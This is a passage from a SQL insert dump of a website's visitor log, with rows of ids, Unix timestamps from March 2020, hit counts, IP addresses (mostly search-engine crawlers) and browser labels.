0,0,'66.249.64.28','chrome'),(487026,1583620003,1,1,0,0,'66.249.64.27','chrome'),(487027,1583620117,3,3,0,0,'66.249.64.26','chrome'),(487028,1583620144,1,1,0,0,'207.46.13.181','other'),(487029,1583620295,1,1,0,0,'77.243.61.193','chrome'),(487030,1583620313,1,1,0,0,'66.249.64.28','chrome'),(487031,1583620869,1,1,0,0,'157.55.39.87','other'),(487032,1583621323,2,2,0,0,'66.249.64.28','chrome'),(487033,1583621423,1,1,0,0,'66.249.70.62','chrome'),(487034,1583621559,2,2,0,0,'66.249.64.26','chrome'),(487035,1583621647,1,1,0,0,'178.154.171.134','other'),(487036,1583621881,1,1,0,0,'157.55.39.192','other'),(487037,1583622085,1,1,0,0,'157.55.39.186','other'),(487038,1583622776,1,1,0,0,'66.249.64.27','chrome'),(487039,1583622919,1,1,0,0,'66.249.64.26','chrome'),(487040,1583623033,1,0,1,0,'157.55.39.186',''),(487041,1583623179,1,1,0,0,'178.154.171.127','other'),(487042,1583623608,2,2,0,0,'66.249.64.28','chrome'),(487043,1583623924,1,1,0,0,'8.29.198.26','other'),(487044,1583623980,1,0,1,0,'207.46.13.181',''),(487045,1583624032,1,1,0,0,'8.29.198.25','other'),(487046,1583624193,1,1,0,0,'66.249.64.26','chrome'),(487047,1583624350,1,1,0,0,'3.134.115.208','chrome'),(487048,1583624772,2,2,0,0,'66.249.64.27','chrome'),(487049,1583625119,2,2,0,0,'66.249.64.30','chrome'),(487050,1583625194,2,2,0,0,'178.154.171.134','other'),(487051,1583625229,2,2,0,0,'66.249.64.28','chrome'),(487052,1583625686,2,2,0,0,'66.249.64.26','chrome'),(487053,1583626196,1,1,0,0,'157.55.39.192','other'),(487054,1583626418,1,1,0,0,'66.249.64.27','chrome'),(487055,1583626568,1,1,0,0,'66.249.64.28','chrome'),(487056,1583626772,2,2,0,0,'66.249.70.33','chrome'),(487057,1583627005,1,1,0,0,'178.154.171.134','other'),(487058,1583627589,1,1,0,0,'66.249.64.28','chrome'),(487059,1583627622,1,1,0,0,'66.249.64.26','chrome'),(487060,1583627996,1,1,0,0,'66.249.70.33','chrome'),(487061,1583628864,1,1,0,0,'66.249.64.26','chrome'),(487062,1583628916,1,1,0,0,'62.205.134.182','other'),(487063,1583629203,1,1,0,0,'66.249.64.27','chrome'),(487064,1583629778,1,1,0,0,'66.249.70.33','chrome'),(487065,1583629954,1,1,0,0,'157.55.39.186','other'),(487066,1583630571,2,2,0,0,'66.249.64.28','chrome'),(487067,1583630672,1,1,0,0,'95.216.96.242','other'),(487068,1583631008,1,1,0,0,'178.154.171.134','other'),(487069,1583631142,2,2,0,0,'66.249.64.26','chrome'),(487070,1583631178,1,1,0,0,'66.249.70.62','chrome'),(487071,1583631477,2,2,0,0,'66.249.64.28','chrome'),(487072,1583631784,1,1,0,0,'66.249.70.33','chrome'),(487073,1583632759,2,2,0,0,'66.249.64.27','chrome'),(487074,1583633391,2,2,0,0,'66.249.64.26','chrome'),(487075,1583634194,1,1,0,0,'178.154.171.127','other'),(487076,1583634340,1,1,0,0,'178.154.171.134','other'),(487077,1583634359,2,2,0,0,'66.249.64.26','chrome'),(487078,1583634434,1,1,0,0,'66.249.70.36','chrome'),(487079,1583634540,1,1,0,0,'66.249.70.33','chrome'),(487080,1583634565,1,1,0,0,'66.249.64.27','chrome'),(487081,1583634579,3,3,0,0,'35.224.22.172','chrome'),(487082,1583634783,3,3,0,0,'35.239.41.221','chrome'),(487083,1583634843,2,2,0,0,'8.29.198.26','other'),(487084,1583634848,2,2,0,0,'66.249.64.28','chrome'),(487085,1583634859,3,3,0,0,'35.184.191.208','chrome'),(487086,1583634895,3,3,0,0,'130.211.211.136','chrome'),(487087,1583634904,1,1,0,0,'34.67.201.60','chrome'),(487088,1583634905,2,2,0,0,'34.67.201.60','chrome'),(487089,1583634914,2,2,0,0,'35.184.102.55','chrome'),(487091,1583635597,2,2,0,0,'66.249.64.27','chrome'),(487092,1583636090,1,1,0,0,'66.249.70.62','chrome'),(487093,1583636154,1,1,0,0,'157.55.39.192','other'),(487094,1583636370,1,1,0,0,'157.55.39.186','other'),(487095,1583636376,1,0,1,0,'66.249.64.28',''),(487096,1583636483,2,2,0,0,'66.249.64.26','chrome'),(487097,1583636935,1,1,0,0,'178.154.171.134','other'),(487098,1583637172,1,1,0,0,'66.249.70.36','chrome'),(487099,1583637836,1,1,0,0,'66.249.64.26','chrome'),(487100,1583637929,2,2,0,0,'207.46.13.181','other'),(487101,1583638212,1,1,0,0,'157.55.39.192','other'),(487102,1583638314,1,1,0,0,'66.249.64.27','chrome'),(487103,1583638451,1,1,0,0,'157.55.39.87','other'),(487104,1583639043,1,1,0,0,'66.249.64.26','chrome'),(487105,1583639986,1,1,0,0,'66.249.64.26','chrome'),(487106,1583640181,2,2,0,0,'66.249.64.27','chrome'),(487107,1583640233,1,1,0,0,'178.154.171.134','other'),(487108,1583641711,1,1,0,0,'157.55.39.186','other'),(487109,1583641989,1,1,0,0,'207.46.13.181','other'),(487110,1583642109,1,1,0,0,'66.249.70.33','chrome'),(487111,1583643416,2,2,0,0,'66.249.64.27','chrome'),(487112,1583643583,1,1,0,0,'157.55.39.192','other'),(487113,1583643591,2,2,0,0,'66.249.64.26','chrome'),(487114,1583643598,2,2,0,0,'66.249.70.36','chrome'),(487115,1583644277,1,1,0,0,'66.249.64.28','chrome'),(487116,1583644658,1,0,1,0,'157.55.39.186',''),(487117,1583644945,1,0,1,0,'157.55.39.192',''),(487118,1583645225,1,1,0,0,'207.46.13.181','other'),(487119,1583645230,1,1,0,0,'66.249.64.27','chrome'),(487120,1583645417,5,5,0,0,'66.249.64.26','chrome'),(487121,1583645450,1,1,0,0,'66.249.70.62','chrome'),(487122,1583645682,1,1,0,0,'8.29.198.25','other'),(487123,1583645785,1,1,0,0,'8.29.198.26','other'),(487124,1583646131,1,1,0,0,'157.55.39.186','other'),(487125,1583646198,1,1,0,0,'62.205.134.182','other'),(487126,1583646999,1,1,0,0,'66.249.70.33','chrome'),(487127,1583647047,1,1,0,0,'157.55.39.87','other'),(487128,1583647211,2,2,0,0,'66.249.64.28','chrome'),(487129,1583647223,1,1,0,0,'66.249.70.62','chrome'),(487130,1583647525,1,1,0,0,'157.55.39.186','other'),(487131,1583647628,1,1,0,0,'178.154.171.134','other'),(487132,1583647838,2,2,0,0,'66.249.64.27','chrome'),(487133,1583648545,1,1,0,0,'66.249.70.62','chrome'),(487134,1583648745,1,1,0,0,'66.249.64.26','chrome'),(487135,1583648898,4,4,0,0,'66.249.64.28','chrome'),(487136,1583650059,1,1,0,0,'178.154.171.134','other'),(487137,1583650100,1,1,0,0,'91.196.178.77','chrome'),(487138,1583650611,1,1,0,0,'207.46.13.181','other'),(487139,1583651014,30,30,0,0,'82.165.202.218','firefox'),(487140,1583651241,1,1,0,0,'66.249.64.26','chrome'),(487141,1583651790,1,1,0,0,'66.249.64.28','chrome'),(487142,1583653507,1,1,0,0,'66.249.64.28','chrome'),(487143,1583654360,1,1,0,0,'157.55.39.192','other'),(487144,1583654988,2,2,0,0,'178.154.171.134','other'),(487145,1583655506,2,2,0,0,'66.249.64.27','chrome'),(487146,1583655741,2,2,0,0,'66.249.64.28','chrome'),(487147,1583655785,2,2,0,0,'207.46.13.181','other'),(487148,1583656304,3,3,0,0,'66.249.64.26','chrome'),(487149,1583656327,1,1,0,0,'66.249.70.62','chrome'),(487150,1583656517,2,2,0,0,'8.29.198.27','other'),(487151,1583657052,4,4,0,0,'157.55.39.186','other'),(487152,1583657233,1,1,0,0,'5.45.207.65','other'),(487153,1583657266,1,1,0,0,'141.8.183.100','other'),(487154,1583657716,1,1,0,0,'66.249.70.62','chrome'),(487155,1583658648,1,1,0,0,'66.249.64.28','chrome'),(487156,1583659158,3,3,0,0,'66.249.64.27','chrome'),(487157,1583659253,1,1,0,0,'207.46.13.181','other'),(487158,1583659734,3,3,0,0,'66.249.64.28','chrome'),(487159,1583660431,1,1,0,0,'66.249.64.26','chrome'),(487160,1583660438,1,1,0,0,'157.55.39.186','other'),(487161,1583661513,2,2,0,0,'66.249.64.28','chrome'),(487162,1583661613,1,1,0,0,'66.249.64.27','chrome'),(487163,1583662458,1,1,0,0,'157.55.39.186','other'),(487164,1583662681,1,1,0,0,'178.154.171.127','other'),(487165,1583663366,1,1,0,0,'66.249.64.28','chrome'),(487166,1583664781,1,1,0,0,'66.249.70.36','chrome'),(487167,1583665498,2,2,0,0,'66.249.64.26','chrome'),(487168,1583665657,1,1,0,0,'157.55.39.186','other'),(487169,1583666488,1,1,0,0,'66.249.64.27','chrome'),(487170,1583666798,2,2,0,0,'66.249.64.26','chrome'),(487171,1583666801,2,2,0,0,'207.46.13.181','other'),(487172,1583666882,2,2,0,0,'66.249.64.28','chrome'),(487173,1583667190,1,1,0,0,'178.154.171.134','other'),(487174,1583667352,1,1,0,0,'8.29.198.25','other'),(487175,1583667365,1,1,0,0,'109.74.154.72','chrome'),(487176,1583667504,1,1,0,0,'8.29.198.27','other'),(487177,1583668192,1,1,0,0,'66.249.64.27','chrome'),(487178,1583668493,1,1,0,0,'66.249.70.62','chrome'),(487179,1583668784,1,1,0,0,'193.106.30.99','firefox'),(487180,1583668938,3,2,1,0,'66.249.64.28',''),(487181,1583669038,2,2,0,0,'207.46.13.181','other'),(487182,1583670449,1,1,0,0,'207.46.13.181','other'),(487183,1583670656,1,1,0,0,'66.249.70.33','chrome'),(487184,1583671272,1,1,0,0,'157.55.39.186','other'),(487185,1583671284,3,3,0,0,'66.249.64.27','chrome'),(487186,1583671522,1,1,0,0,'207.46.13.181','other'),(487187,1583671678,2,2,0,0,'157.55.39.127','other'),(487188,1583672198,2,2,0,0,'66.249.64.28','chrome'),(487189,1583672847,1,1,0,0,'207.46.13.181','other'),(487190,1583673198,1,1,0,0,'66.249.64.27','chrome'),(487191,1583674051,1,1,0,0,'66.249.64.26','chrome'),(487192,1583674112,1,1,0,0,'66.249.64.27','chrome'),(487193,1583674279,1,1,0,0,'157.55.39.127','other'),(487194,1583674330,1,1,0,0,'66.249.64.28','chrome'),(487195,1583675083,1,1,0,0,'66.249.70.33','chrome'),(487196,1583675154,1,0,1,0,'207.46.13.181',''),(487197,1583675231,2,2,0,0,'157.55.39.186','other'),(487198,1583675393,1,1,0,0,'94.153.105.156','chrome'),(487199,1583675564,1,1,0,0,'157.55.39.127','other'),(487200,1583676259,1,1,0,0,'66.249.70.36','chrome'),(487201,1583676765,1,1,0,0,'66.249.64.26','chrome'),(487202,1583676905,1,1,0,0,'157.55.39.186','other'),(487203,1583677269,1,1,0,0,'178.154.171.134','other'),(487204,1583677961,1,1,0,0,'157.55.39.127','other'),(487205,1583678086,4,4,0,0,'66.249.64.28','chrome'),(487206,1583678089,1,1,0,0,'66.249.64.27','chrome'),(487207,1583678209,1,1,0,0,'8.29.198.26','other'),(487208,1583678210,1,1,0,0,'178.154.171.127','other'),(487209,1583678361,1,1,0,0,'8.29.198.25','other'),(487210,1583679203,2,2,0,0,'66.249.64.27','chrome'),(487211,1583679220,1,1,0,0,'157.55.39.127','other'),(487212,1583679311,1,1,0,0,'157.55.39.186','other'),(487213,1583679536,2,2,0,0,'66.249.70.33','chrome'),(487214,1583679998,1,1,0,0,'66.249.70.62','chrome'),(487215,1583681043,2,2,0,0,'66.249.64.28','chrome'),(487216,1583681199,2,2,0,0,'157.55.39.127','other'),(487217,1583681732,1,1,0,0,'66.249.64.27','chrome'),(487218,1583682735,4,4,0,0,'207.46.13.181','other'),(487219,1583682964,2,2,0,0,'66.249.64.28','chrome'),(487220,1583683085,2,2,0,0,'157.55.39.186','other'),(487221,1583683275,1,1,0,0,'66.249.70.62','chrome'),(487222,1583683357,1,1,0,0,'66.249.64.26','chrome'),(487223,1583684575,1,0,1,0,'66.249.64.27',''),(487224,1583684703,1,1,0,0,'66.249.70.62','chrome'),(487225,1583684746,1,1,0,0,'207.46.13.181','other'),(487226,1583685035,2,2,0,0,'66.249.64.26','chrome'),(487227,1583685235,1,1,0,0,'157.55.39.186','other'),(487228,1583685361,1,1,0,0,'66.249.70.36','chrome'),(487229,1583685749,1,1,0,0,'207.46.13.181','other'),(487230,1583686263,2,1,1,0,'66.249.64.27',''),(487231,1583686364,2,2,0,0,'157.55.39.186','other'),(487232,1583686659,2,2,0,0,'66.249.70.62','chrome'),(487233,1583686669,1,1,0,0,'157.55.39.127','other'),(487234,1583687145,1,1,0,0,'31.13.127.23','other'),(487235,1583687146,1,1,0,0,'31.13.127.4','other'),(487237,1583687264,2,2,0,0,'66.249.64.27','chrome'),(487238,1583687469,1,1,0,0,'66.249.64.28','chrome'),(487239,1583687481,1,1,0,0,'66.249.70.33','chrome'),(487240,1583687502,1,0,1,0,'157.55.39.186',''),(487241,1583687563,2,2,0,0,'157.55.39.186','other'),(487242,1583687813,1,1,0,0,'157.55.39.127','other'),(487243,1583687987,1,1,0,0,'66.249.70.62','chrome'),(487244,1583688153,1,1,0,0,'66.249.64.26','chrome'),(487245,1583688412,1,1,0,0,'207.46.13.181','other'),(487246,1583689065,1,1,0,0,'8.29.198.27','other'),(487247,1583689066,3,3,0,0,'66.249.64.26','chrome'),(487248,1583689224,1,1,0,0,'8.29.198.26','other'),(487249,1583689491,1,1,0,0,'66.249.70.33','chrome'),(487250,1583689494,1,1,0,0,'66.249.64.27','chrome'),(487251,1583690355,2,2,0,0,'157.55.39.127','other'),(487252,1583691124,1,1,0,0,'66.249.64.26','chrome'),(487253,1583691358,2,2,0,0,'66.249.64.27','chrome'),(487254,1583691822,1,1,0,0,'178.154.171.127','other'),(487255,1583692222,1,1,0,0,'66.249.70.33','chrome'),(487256,1583692395,2,2,0,0,'66.249.64.28','chrome'),(487257,1583692566,1,1,0,0,'66.249.70.36','chrome'),(487258,1583692979,3,3,0,0,'66.249.64.26','chrome'),(487259,1583693176,1,1,0,0,'66.249.64.27','chrome'),(487260,1583694013,2,2,0,0,'66.249.64.28','chrome'),(487261,1583694033,1,1,0,0,'66.249.64.26','chrome'),(487262,1583694771,1,1,0,0,'66.249.64.27','chrome'),(487263,1583695049,1,1,0,0,'157.55.39.127','other'),(487264,1583695467,1,1,0,0,'91.196.178.139','firefox'),(487265,1583695992,2,2,0,0,'66.249.64.26','chrome'),(487266,1583696140,2,2,0,0,'178.154.171.134','other'),(487267,1583696427,1,1,0,0,'66.249.70.36','chrome'),(487268,1583696437,1,1,0,0,'66.249.64.28','chrome'),(487269,1583696479,2,2,0,0,'66.249.64.27','chrome'),(487270,1583696982,1,1,0,0,'207.46.13.181','other'),(487271,1583697099,1,1,0,0,'66.249.70.62','chrome'),(487272,1583697245,2,2,0,0,'157.55.39.186','other'),(487273,1583697406,2,2,0,0,'66.249.70.36','chrome'),(487274,1583697445,1,0,1,0,'157.55.39.127',''),(487275,1583697650,1,1,0,0,'66.249.64.27','chrome'),(487276,1583698262,1,1,0,0,'66.249.64.28','chrome'),(487277,1583698547,1,1,0,0,'66.249.64.26','chrome'),(487278,1583699010,1,1,0,0,'66.249.70.36','chrome'),(487279,1583699327,2,2,0,0,'66.249.64.28','chrome'),(487280,1583699352,1,1,0,0,'66.249.70.33','chrome'),(487281,1583699902,1,1,0,0,'8.29.198.25','other'),(487282,1583700071,1,1,0,0,'8.29.198.27','other'),(487283,1583700768,2,2,0,0,'157.55.39.186','other'),(487284,1583700913,1,1,0,0,'66.249.64.28','chrome'),(487285,1583700933,1,1,0,0,'66.249.64.27','chrome'),(487286,1583701303,2,2,0,0,'66.249.70.36','chrome'),(487287,1583701366,1,1,0,0,'178.154.171.134','other'),(487288,1583701755,1,1,0,0,'66.249.70.62','chrome'),(487289,1583702448,1,1,0,0,'66.249.64.26','chrome'),(487290,1583703679,2,2,0,0,'66.249.64.28','chrome'),(487291,1583703961,2,2,0,0,'66.249.64.27','chrome'),(487292,1583704322,1,1,0,0,'178.154.171.134','other'),(487293,1583704405,1,1,0,0,'141.8.183.73','other'),(487294,1583705050,1,1,0,0,'66.249.64.27','chrome'),(487295,1583705330,1,1,0,0,'157.55.39.199','other'),(487296,1583705535,1,1,0,0,'157.55.39.127','other'),(487297,1583705589,2,2,0,0,'66.249.64.26','chrome'),(487298,1583705639,1,1,0,0,'207.46.13.181','other'),(487299,1583706676,1,1,0,0,'66.249.64.28','chrome'),(487300,1583706679,1,1,0,0,'66.249.70.62','chrome'),(487301,1583707664,1,1,0,0,'66.249.64.26','chrome'),(487302,1583707744,2,2,0,0,'157.55.39.186','other'),(487303,1583708161,1,1,0,0,'157.55.39.127','other'),(487304,1583708699,2,2,0,0,'66.249.70.62','chrome'),(487305,1583709447,1,1,0,0,'157.55.39.199','other'),(487306,1583709727,2,2,0,0,'66.249.64.27','chrome'),(487307,1583710167,1,1,0,0,'66.249.70.36','chrome'),(487308,1583710342,1,1,0,0,'66.249.70.33','chrome'),(487309,1583710533,3,1,2,0,'157.55.39.127',''),(487310,1583710623,3,3,0,0,'207.46.13.206','other'),(487311,1583710631,2,2,0,0,'207.46.13.240','other'),(487312,1583710740,2,2,0,0,'8.29.198.25','other'),(487313,1583710944,2,0,2,0,'157.55.39.186',''),(487314,1583710984,2,0,2,0,'157.55.39.199',''),(487315,1583711082,2,2,0,0,'66.249.64.28','chrome'),(487316,1583711871,1,1,0,0,'66.249.70.62','chrome'),(487317,1583712115,1,1,0,0,'66.249.70.33','chrome'),(487318,1583712205,2,2,0,0,'66.249.64.27','chrome'),(487319,1583712457,1,1,0,0,'178.154.171.134','other'),(487320,1583712502,1,1,0,0,'198.27.70.196','other'),(487321,1583712789,1,1,0,0,'51.68.152.26','chrome'),(487322,1583712922,1,1,0,0,'66.249.64.28','chrome'),(487323,1583713017,1,1,0,0,'157.55.39.199','other'),(487324,1583713503,2,2,0,0,'66.249.70.36','chrome'),(487325,1583713717,115,115,0,0,'128.199.72.94','firefox'),(487326,1583713725,7,7,0,0,'128.199.72.94','other'),(487327,1583713956,2,2,0,0,'157.55.39.199','other'),(487328,1583714041,3,3,0,0,'66.249.64.30','chrome'),(487329,1583714310,1,1,0,0,'178.154.171.134','other'),(487330,1583714624,1,1,0,0,'17.58.101.25','other'),(487331,1583714708,1,1,0,0,'138.246.253.15','chrome'),(487332,1583714844,1,1,0,0,'178.154.171.127','other'),(487333,1583715316,1,1,0,0,'62.205.134.182','other'),(487334,1583715501,2,2,0,0,'66.249.64.26','chrome'),(487335,1583715602,1,1,0,0,'66.249.70.36','chrome'),(487336,1583715722,1,1,0,0,'66.249.70.62','chrome'),(487337,1583715961,1,1,0,0,'66.249.64.28','chrome'),(487338,1583717547,1,1,0,0,'157.55.39.127','other'),(487339,1583718256,1,1,0,0,'66.249.64.26','chrome'),(487340,1583718274,1,1,0,0,'207.46.13.240','other'),(487341,1583718464,1,1,0,0,'66.249.70.62','chrome'),(487342,1583718647,1,1,0,0,'207.46.13.181','other'),(487343,1583719370,1,1,0,0,'157.55.39.127','other'),(487344,1583719455,1,1,0,0,'178.154.171.134','other'),(487345,1583719903,1,1,0,0,'66.249.64.27','chrome'),(487346,1583720269,1,1,0,0,'66.249.64.26','chrome'),(487347,1583720705,1,0,1,0,'157.55.39.199',''),(487348,1583721196,5,5,0,0,'66.249.64.26','chrome'),(487349,1583721325,1,1,0,0,'66.249.64.27','chrome'),(487350,1583721434,1,0,1,0,'207.46.13.181',''),(487351,1583721443,1,0,1,0,'157.55.39.127',''),(487352,1583721594,1,1,0,0,'8.29.198.26','other'),(487353,1583721792,1,1,0,0,'8.29.198.27','other'),(487354,1583723689,1,1,0,0,'207.46.13.181','other'),(487355,1583724732,1,1,0,0,'157.55.39.127','other'),(487356,1583724825,1,1,0,0,'66.249.64.26','chrome'),(487357,1583724946,2,2,0,0,'66.249.64.28','chrome'),(487358,1583726672,2,2,0,0,'66.249.64.28','chrome'),(487359,1583726739,3,3,0,0,'66.249.64.26','chrome'),(487360,1583726837,1,1,0,0,'207.46.13.94','other'),(487361,1583727764,1,1,0,0,'66.249.70.36','chrome'),(487362,1583728142,4,4,0,0,'66.249.64.26','chrome'),(487363,1583728430,2,2,0,0,'66.249.64.28','chrome'),(487364,1583728496,1,1,0,0,'66.249.70.33','chrome'),(487365,1583728626,1,1,0,0,'66.249.64.27','chrome'),(487366,1583729874,2,2,0,0,'66.249.64.26','chrome'),(487367,1583731814,3,3,0,0,'66.249.64.26','chrome'),(487368,1583732011,1,1,0,0,'91.196.178.20','chrome'),(487369,1583732358,1,1,0,0,'66.249.64.28','chrome'),(487370,1583732407,1,1,0,0,'62.205.134.182','other'),(487371,1583732437,1,1,0,0,'8.29.198.25','other'),(487372,1583732663,1,1,0,0,'8.29.198.26','other'),(487373,1583732673,1,1,0,0,'66.249.64.27','chrome'),(487374,1583732719,2,2,0,0,'66.249.64.26','chrome'),(487375,1583733673,1,1,0,0,'207.46.13.181','other'),(487376,1583734342,1,1,0,0,'66.249.64.27','chrome'),(487377,1583734988,2,2,0,0,'66.249.64.26','chrome'),(487378,1583735456,1,0,1,0,'207.46.13.181',''),(487379,1583735619,1,0,1,0,'66.249.64.28',''),(487380,1583736480,2,2,0,0,'66.249.64.28','chrome'),(487381,1583737196,2,2,0,0,'66.249.64.27','chrome'),(487382,1583737521,2,2,0,0,'66.249.64.26','chrome'),(487383,1583737583,1,1,0,0,'66.249.64.28','chrome'),(487384,1583738492,2,2,0,0,'207.46.13.181','other'),(487385,1583739250,1,1,0,0,'178.154.171.134','other'),(487386,1583739345,1,1,0,0,'66.249.70.33','chrome'),(487387,1583740473,6,6,0,0,'192.99.15.199','other'),(487388,1583740512,1,1,0,0,'66.249.70.62','chrome'),(487389,1583740745,1,1,0,0,'66.249.64.28','chrome'),(487390,1583740818,1,1,0,0,'91.196.178.16','chrome'),(487391,1583741741,2,2,0,0,'66.249.64.27','chrome'),(487392,1583741873,3,3,0,0,'66.249.64.28','chrome'),(487393,1583742853,2,2,0,0,'66.249.64.28','chrome'),(487394,1583743275,1,1,0,0,'8.29.198.25','other'),(487395,1583743282,2,2,0,0,'178.154.171.134','other'),(487396,1583743533,1,1,0,0,'8.29.198.27','other'),(487397,1583743641,1,1,0,0,'37.113.62.22','chrome'),(487398,1583744226,2,2,0,0,'66.249.64.27','chrome'),(487399,1583744615,1,1,0,0,'207.46.13.181','other'),(487400,1583744728,1,1,0,0,'66.249.64.26','chrome'),(487401,1583745203,2,2,0,0,'179.43.169.182','firefox'),(487402,1583745412,2,2,0,0,'34.240.209.136','chrome'),(487403,1583745629,1,1,0,0,'66.249.64.28','chrome'),(487404,1583746230,1,0,1,0,'207.46.13.94',''),(487405,1583746649,1,1,0,0,'157.55.39.127','other'),(487406,1583746894,1,1,0,0,'207.46.13.181','other'),(487407,1583747393,1,1,0,0,'66.249.70.36','chrome'),(487408,1583747555,1,1,0,0,'35.170.82.216','chrome'),(487409,1583747911,1,1,0,0,'207.46.13.94','other'),(487410,1583748111,1,1,0,0,'66.249.64.28','chrome'),(487411,1583748325,1,1,0,0,'66.249.70.36','chrome'),(487412,1583749074,1,1,0,0,'178.154.171.134','other'),(487413,1583749656,1,1,0,0,'66.249.64.30','chrome'),(487414,1583750415,1,1,0,0,'207.46.13.181','other'),(487415,1583751211,2,1,1,0,'207.46.13.94',''),(487416,1583752261,1,1,0,0,'66.249.70.33','chrome'),(487417,1583752301,2,1,1,0,'207.46.13.181',''),(487418,1583753024,1,1,0,0,'66.249.64.30','chrome'),(487419,1583754113,2,2,0,0,'8.29.198.26','other'),(487420,1583754845,1,1,0,0,'178.154.171.134','other'),(487421,1583754862,2,2,0,0,'66.249.64.28','chrome'),(487422,1583755149,1,1,0,0,'23.83.179.107','chrome'),(487423,1583755187,1,1,0,0,'107.158.85.91','chrome'),(487424,1583755808,1,1,0,0,'66.249.64.28','chrome'),(487425,1583756378,1,1,0,0,'66.249.70.62','chrome'),(487426,1583756474,1,1,0,0,'2.47.39.211','other'),(487427,1583756781,1,1,0,0,'207.46.13.181','other'),(487428,1583756931,3,3,0,0,'66.249.64.30','chrome'),(487429,1583757470,2,2,0,0,'207.46.13.94','other'),(487430,1583757714,1,1,0,0,'207.46.13.181','other'),(487431,1583758036,1,1,0,0,'109.74.154.72','chrome'),(487432,1583758188,1,1,0,0,'66.249.70.33','chrome'),(487433,1583759160,1,1,0,0,'207.46.13.94','other'),(487434,1583760278,1,1,0,0,'178.154.171.127','other'),(487435,1583760979,1,1,0,0,'178.154.171.134','other'),(487436,1583761003,1,1,0,0,'207.46.13.94','other'),(487437,1583761671,1,0,1,0,'157.55.39.127',''),(487438,1583762119,1,1,0,0,'178.154.171.127','other'),(487439,1583762224,2,2,0,0,'207.46.13.94','other'),(487440,1583762971,1,1,0,0,'66.249.70.62','chrome'),(487441,1583762972,1,1,0,0,'66.249.70.33','chrome'),(487442,1583762974,1,1,0,0,'66.249.70.36','chrome'),(487443,1583763058,2,1,1,0,'66.249.64.28',''),(487444,1583763705,1,0,1,0,'207.46.13.181',''),(487445,1583764056,2,2,0,0,'66.249.64.28','chrome'),(487446,1583764693,1,1,0,0,'157.55.39.127','other'),(487447,1583764952,2,2,0,0,'8.29.198.25','other'),(487448,1583765234,1,1,0,0,'207.46.13.94','other'),(487449,1583765442,1,1,0,0,'207.46.13.181','other'),(487450,1583765519,1,1,0,0,'66.249.64.28','chrome'),(487451,1583766034,1,1,0,0,'178.154.171.134','other'),(487452,1583766238,1,1,0,0,'66.249.70.62','chrome'),(487453,1583766675,1,0,1,0,'207.46.13.181',''),(487454,1583766848,2,2,0,0,'66.249.64.30','chrome'),(487455,1583766986,1,1,0,0,'207.46.13.181','other'),(487456,1583767318,1,1,0,0,'178.154.171.134','other'),(487457,1583767655,3,1,2,0,'207.46.13.94',''),(487458,1583768279,1,1,0,0,'66.249.70.33','chrome'),(487459,1583768350,1,1,0,0,'95.108.181.104','other'),(487460,1583768747,1,1,0,0,'66.249.64.30','chrome'),(487461,1583769649,1,1,0,0,'207.46.13.181','other'),(487462,1583770083,1,1,0,0,'207.46.13.94','other'),(487463,1583771414,1,1,0,0,'178.154.171.134','other'),(487464,1583774040,2,2,0,0,'178.154.171.134','other'),(487465,1583774675,1,1,0,0,'89.200.253.14','chrome'),(487466,1583775316,1,1,0,0,'178.154.171.134','other'),(487467,1583775492,1,1,0,0,'45.152.34.16','chrome'),(487468,1583775567,1,1,0,0,'23.83.179.123','chrome'),(487469,1583775814,2,2,0,0,'8.29.198.26','other'),(487470,1583777026,1,1,0,0,'207.46.13.181','other'),(487471,1583777324,2,2,0,0,'178.154.171.127','other'),(487472,1583777437,1,1,0,0,'66.249.70.36','chrome'),(487473,1583777465,1,1,0,0,'66.249.64.28','chrome'),(487474,1583778979,1,1,0,0,'178.93.148.240','chrome'),(487475,1583778993,1,1,0,0,'66.249.64.28','chrome'),(487476,1583779063,1,0,1,0,'207.46.13.181',''),(487477,1583779112,1,1,0,0,'157.55.39.127','other'),(487478,1583779546,1,1,0,0,'66.249.64.27','chrome'),(487479,1583779909,1,1,0,0,'178.154.171.134','other'),(487480,1583780848,1,1,0,0,'141.8.183.100','other'),(487481,1583781301,1,1,0,0,'178.154.171.127','other'),(487482,1583781663,2,2,0,0,'93.119.227.34','other'),(487483,1583782625,1,1,0,0,'178.154.171.134','other'),(487484,1583782672,1,1,0,0,'131.220.6.152','chrome'),(487485,1583782808,1,1,0,0,'66.249.64.28','chrome'),(487486,1583783715,1,1,0,0,'91.196.178.155','firefox'),(487487,1583784328,1,1,0,0,'178.154.171.134','other'),(487488,1583784397,1,1,0,0,'66.249.64.26','chrome'),(487489,1583784829,2,2,0,0,'207.46.13.181','other'),(487490,1583785251,1,1,0,0,'66.249.64.28','chrome'),(487491,1583785764,1,1,0,0,'66.249.64.27','chrome'),(487492,1583785774,2,2,0,0,'95.213.141.126','opera'),(487493,1583786659,1,1,0,0,'8.29.198.26','other'),(487494,1583786761,2,2,0,0,'66.249.64.27','chrome'),(487495,1583786765,1,1,0,0,'66.249.64.26','chrome'),(487496,1583786980,1,1,0,0,'8.29.198.27','other'),(487497,1583787793,2,2,0,0,'66.249.64.26','chrome'),(487498,1583788264,2,2,0,0,'66.249.64.27','chrome'),(487499,1583788388,1,1,0,0,'178.154.171.134','other'),(487500,1583789785,2,2,0,0,'178.154.171.127','other'),(487501,1583789837,4,4,0,0,'66.249.64.27','chrome'),(487502,1583790027,2,2,0,0,'66.249.64.28','chrome'),(487503,1583790339,2,2,0,0,'178.154.171.134','other'),(487504,1583790457,3,3,0,0,'66.249.64.26','chrome'),(487505,1583791362,1,0,1,0,'207.46.13.181',''),(487506,1583791532,1,1,0,0,'66.249.64.26','chrome'),(487507,1583793006,1,1,0,0,'66.249.70.62','chrome'),(487508,1583793019,1,1,0,0,'66.249.64.27','chrome'),(487509,1583793503,1,1,0,0,'207.46.13.181','other'),(487510,1583794127,1,0,1,0,'66.249.64.28',''),(487511,1583794128,1,1,0,0,'178.154.171.134','other'),(487512,1583794962,2,2,0,0,'66.249.64.28','chrome'),(487513,1583795010,1,1,0,0,'131.220.6.152','chrome'),(487514,1583795140,1,1,0,0,'66.249.64.27','chrome'),(487515,1583795227,1,1,0,0,'66.249.70.33','chrome'),(487516,1583795256,2,2,0,0,'178.154.171.134','other'),(487517,1583796030,1,1,0,0,'178.154.171.127','other'),(487518,1583796255,1,1,0,0,'207.46.13.181','other'),(487519,1583796750,1,1,0,0,'66.249.70.36','chrome'),(487520,1583797094,1,1,0,0,'66.249.70.62','chrome'),(487521,1583797454,1,1,0,0,'178.154.171.127','other'),(487522,1583797498,2,2,0,0,'8.29.198.25','other'),(487523,1583798437,2,2,0,0,'207.46.13.181','other'),(487524,1583798805,1,1,0,0,'66.249.64.28','chrome'),(487525,1583799137,1,1,0,0,'178.154.171.127','other'),(487526,1583799177,1,1,0,0,'66